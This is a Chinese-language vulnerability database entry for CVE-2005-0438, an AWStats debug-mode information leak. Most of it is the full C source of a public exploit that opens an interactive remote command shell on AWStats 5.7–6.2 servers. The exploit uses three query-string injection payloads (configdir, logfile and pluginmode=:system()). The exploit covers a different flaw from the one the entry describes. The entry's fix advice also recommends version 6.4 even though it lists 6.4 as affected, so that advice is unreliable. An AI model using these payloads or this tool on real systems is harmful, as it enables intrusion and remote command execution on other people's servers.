CVE-2005-0438
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:46:17
NMCOE    

[原文]awstats.pl in AWStats 6.3 and 6.4 allows remote attackers to obtain sensitive information by setting the debug parameter.


[CNNVD]AWStats漏洞(CNNVD-200505-649)

        AWStats 6.3和6.4中的awstats.pl使得远程攻击者可以通过设置调试参数来获取敏感信息。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:awstats:awstats:6.4
cpe:/a:awstats:awstats:6.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0438
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0438
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-649
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/14299
(VENDOR_ADVISORY)  SECUNIA  14299
http://xforce.iss.net/xforce/xfdb/19477
(UNKNOWN)  XF  awstats-information-disclosure(19477)
http://www.securityfocus.com/archive/1/390368
(VENDOR_ADVISORY)  BUGTRAQ  20050214 AWStats <= 6.4 Multiple vulnerabilities

- 漏洞信息

AWStats漏洞
中危 未知
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        AWStats 6.3和6.4中的awstats.pl使得远程攻击者可以通过设置调试参数来获取敏感信息。

- 公告与补丁

        暂无数据

- 漏洞信息 (853)

AWStats 5.7 - 6.2 Multiple Remote Exploit (extra) (EDBID:853)
cgi webapps
2005-03-02 Verified
0 omin0us
/*
 * Awstats exploit "shell" 
 * code by omin0us
 * omin0us208 [at] gmail [dot] com
 * dtors security group
 * .:( http://dtors.ath.cx ):.
 *
 * Vulnerability reported by iDEFENSE
 * pluginmode bug has been found by GHC team.
 *
 * The awstats exploit that was discovered allows
 * a user to execute arbitrary commands on the
 * remote server with the privileges of the httpd process.
 *
 * This exploit combines all three methods of exploitation
 * and acts as a remote "shell", parsing all returned 
 * data to display command output and running in a loop
 * for continuous access.
 * 
 * bash-2.05b$ awstats_shell localhost                                     
 * Awstats 5.7 - 6.2 exploit Shell 0.1
 * code by omin0us
 * dtors security group
 * .: http://dtors.ath.cx :.
 * --------------------------------------
 * select exploit method:
 *        1. ?configdir=|cmd}
 *        2. ?update=1&logfile=|cmd|
 *        3. ?pluginmode=:system("cmd");
 *
 * method [1/2/3]? 1
 * starting shell...
 * (ctrl+c to exit)
 * sh3ll> id
 * uid=80(www) gid=80(www) groups=80(www)
 * DTORS_STOP
 * sh3ll> uname -a
 *
 * FreeBSD omin0us.dtors.ath.cx 4.8-RELEASE FreeBSD 4.8-RELEASE #3: Mon Oct 11 
 * 19:34:01 EDT 2004     omin0us@localhost:/usr/src/sys/compile/DTORS  i386
 * DTORS_STOP
 * sh3ll>
 *
 * this is licensed under the GPL
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80
#define CMD_BUFFER 512
#define IN_BUFFER 10000
#define MAGIC_START "DTORS_START"
#define MAGIC_STOP  "DTORS_STOP"

void usage(char *argv[]);

/*
 * main: interactive client for the AWStats command-injection PoC.
 *
 * Reads the target host from argv, asks which of three request shapes to
 * use, then loops: prompt for a command line on stdin, open a fresh TCP
 * connection to PORT, send one HTTP/1.0 GET whose query string carries the
 * command wrapped between "echo MAGIC_START" and "echo MAGIC_STOP", and
 * print the bytes received between the two markers.  Every error path
 * calls exit(1); the final return(0) is never reached because the
 * command loop only ends through exit().
 *
 * Detection note: the requests built below contain fixed literals (the
 * MAGIC_START / MAGIC_STOP words, "echo;echo+", "configdir=|",
 * "logfile=|", "pluginmode=:system(") that are written verbatim into the
 * target's HTTP access log, so they are reliable indicators of this tool
 * for log review and request filtering.
 */
int main(int argc, char *argv[]){

	FILE *output;                               // stdio write wrapper around sockfd
	int sockfd;
	struct sockaddr_in addr;
	struct hostent *host;
	char *host_name=NULL, *awstats_dir=NULL;    // host_name is never used below
	char cmd[CMD_BUFFER], cmd_url[CMD_BUFFER*3], incoming[IN_BUFFER], tmp, c, cli_opt;
	// NOTE(review): method has no initializer but is read in the loop
	// condition below before any assignment, so the first test is on an
	// indeterminate value.
	int i, j, flag, method, verbose=0;

	
	if(argc < 2){
		usage(argv);    // usage() calls exit(1) and does not return
	}
	
	printf("Awstats 5.7 - 6.2 exploit Shell 0.1\n");	
	printf("code by omin0us\n");
	printf("dtors security group\n");
	printf(".: http://dtors.ath.cx :.\n");
    printf("--------------------------------------\n");

	// Option parsing.  getopt() returns an int but the result is stored in a
	// char; the "< 0" end-of-options test only works where char is signed.
	// "h:" is declared as an option with an argument but no case handles it.
	while(1){
		cli_opt = getopt(argc, argv, "h:d:v");

		if(cli_opt < 0)
			break;

		switch(cli_opt){
			case 'v':
				verbose = 1;
				break;
			case 'd':
				awstats_dir = optarg;
				break;
		}
	}

	// The host is the first non-option argument; a bare "-" is rejected.
	if((optind >= argc) || (strcmp(argv[optind], "-") == 0)){
		printf("Please specify a Host\n");
		usage(argv);
	}

	// Default script path when -d was not given.
	if(!awstats_dir){
		awstats_dir = "/cgi-bin/awstats.pl";
	}
	
	printf("select exploit method:\n"
	       "\t1. ?configdir=|cmd}\n"
	       "\t2. ?update=1&logfile=|cmd|\n"
	       "\t3. ?pluginmode=:system(\"cmd\");\n");
	// Consume stdin one byte at a time until one of the three digit
	// characters is seen.  Whatever follows the digit (normally the newline)
	// is left on stdin and is picked up by the first fgets() below.
	while(method != '1' && method != '2' && method != '3'){
		printf("\nmethod [1/2/3]? ");
		method = getchar();
	}

	printf("starting shell...\n(ctrl+c to exit)\n");
		
	
// One connection per command; buffers are cleared at the top of each turn.
while(1){
	i=0;
	j=0;
	memset(cmd, 0, CMD_BUFFER);
	memset(cmd_url, 0, CMD_BUFFER*3);
	memset(incoming, 0, IN_BUFFER);
	
	if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
		printf("Error creating socket\n");
		exit(1);
	}

	// The host name is re-resolved on every iteration.
	if((host = gethostbyname(argv[optind])) == NULL){
		printf("Could not resolv host\n");
		exit(1);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(PORT);
	addr.sin_addr = *((struct in_addr *)host->h_addr);    // first address only

	// fgets() keeps the trailing newline.  Its return value is not checked:
	// on EOF cmd stays all-zero from the memset above and the
	// "strlen(cmd)-1" index further down becomes (size_t)-1, an
	// out-of-bounds write.
	printf("sh3ll> ");
	fgets(cmd, CMD_BUFFER-1, stdin);
	
	// NOTE(review): inet_ntoa() is declared in <arpa/inet.h>, which is not
	// among this file's includes, so this call relies on an implicit
	// declaration.
	if(verbose)	
		printf("Connecting to %s (%s)...\n", host->h_name, inet_ntoa(*((struct in_addr *)host->h_addr)));

	if( connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) != 0){
		printf("Count not connect to host\n");
		exit(1);
	}

	// Unbuffered stdio stream over the socket so each fprintf() is sent
	// immediately; reads below go through the raw descriptor instead.
	output = fdopen(sockfd, "a");
	setbuf(output, NULL);

	// Strip the newline; an empty line defaults to "id".  The '\0' is written
	// at index 3, but index 2 is already zero from the memset, so the
	// resulting string is "id".
	cmd[strlen(cmd)-1] = '\0';
	if(strlen(cmd) == 0){
		cmd[0]='i';
		cmd[1]='d';
		cmd[3]='\0';
	}

	// Minimal URL encoding: only spaces become "%20"; every other byte is
	// copied unchanged.  The 3x growth worst case fits cmd_url (CMD_BUFFER*3).
	for(i=0; i<strlen(cmd); i++){
		c = cmd[i];
		if(c == ' '){
			cmd_url[j++] = '%';
			cmd_url[j++] = '2';
			cmd_url[j++] = '0';
		}
		else{
			cmd_url[j++] = c;
		}
	}
	cmd_url[j] = '\0';

	// Request templates.  Each wraps the command between "echo MAGIC_START"
	// and "echo MAGIC_STOP" so the reply can be delimited below.  Spaces in
	// the fixed parts are written as '+'.  Lines end in "\n\n" rather than
	// CRLF.  In verbose mode the exact request is echoed to stdout first.
	if(method == '1'){
		if(verbose){
			printf("Sending Request\n");	
			printf("GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
		}
	
		fprintf(output, "GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
	}

	if(method == '2'){
		if(verbose){
			printf("Sending Request\n");
			printf("GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
		}
		fprintf(output, "GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
	}

	// Method 3 is the only one that sends a Host header.
	if(method == '3'){
		if(verbose){
			printf("Sending Request\n");
			printf("GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\"); HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Host: %s\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP, argv[optind]);
		}
		fprintf(output, "GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\"); HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Host: %s\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP, argv[optind]);
	}


	// Phase 1: read one byte at a time, silently, until the START marker is
	// in the buffer.  read() returning 0 (EOF) is treated as failure; a -1
	// error return is not distinguished from success, so the stale value of
	// tmp is appended until the buffer-full check fires.
	i=0;
	while(strstr(incoming, MAGIC_START) == NULL){
		flag = read(sockfd, &tmp, 1);
		incoming[i++] = tmp;

		if(i >= IN_BUFFER){
			printf("flag [-] incoming buffer full\n");
			exit(1);
		}
		if(flag==0){
			printf("exploitation of host failed\n");
			exit(1);
		}
	}
	
	// Phase 2: echo every byte to stdout until the STOP marker arrives.  The
	// marker itself is printed (see the sample session in the file header).
	// read()'s return value is ignored here, so on EOF the last byte is
	// repeated until IN_BUFFER is reached.
	while(strstr(incoming, MAGIC_STOP) == NULL){
		read(sockfd,&tmp,1);
		incoming[i++] = tmp;
		putchar(tmp);
		if(i >= IN_BUFFER){
			printf("putchar [-] incoming buffer full\n");
			exit(1);
		}
	}
	printf("\n");
	
	// Teardown.  close() releases sockfd, then fclose() on the FILE that
	// still wraps the same descriptor number closes it a second time.
	shutdown(sockfd, SHUT_WR);
	close(sockfd);
	fclose(output);
	}
	return(0);    // not reached: the loop above only exits via exit()
}

/*
 * usage: print the command-line help to stdout and terminate.
 *
 * argv[0] is used as the program name in the first and last lines.
 * Always ends the process with exit(1); never returns to the caller.
 */
void usage(char *argv[]){
        static const char *const option_help[] = {
                "Options:\n",
                "    -d <awstats_dir>     directory of awstats script\n",
                "                         '/cgi-bin/awstats.pl' is default\n",
                "                         if no directory is specified\n\n",
                "    -v                   verbose mode (optional)\n\n",
        };
        const char *prog = argv[0];

        printf("Usage: %s [options] <host>\n" , prog);
        for(size_t k = 0; k < sizeof option_help / sizeof option_help[0]; k++){
                fputs(option_help[k], stdout);
        }
        printf("example: %s -d /stats/awstats.pl website.com\n\n", prog);
        exit(1);
}	

// milw0rm.com [2005-03-02]
		

- 漏洞信息

13834
AWStats awstats.pl debug mode Information Disclosure
Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-14 Unknow
2005-02-14 Unknow

- 解决方案

Upgrade to version 6.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 
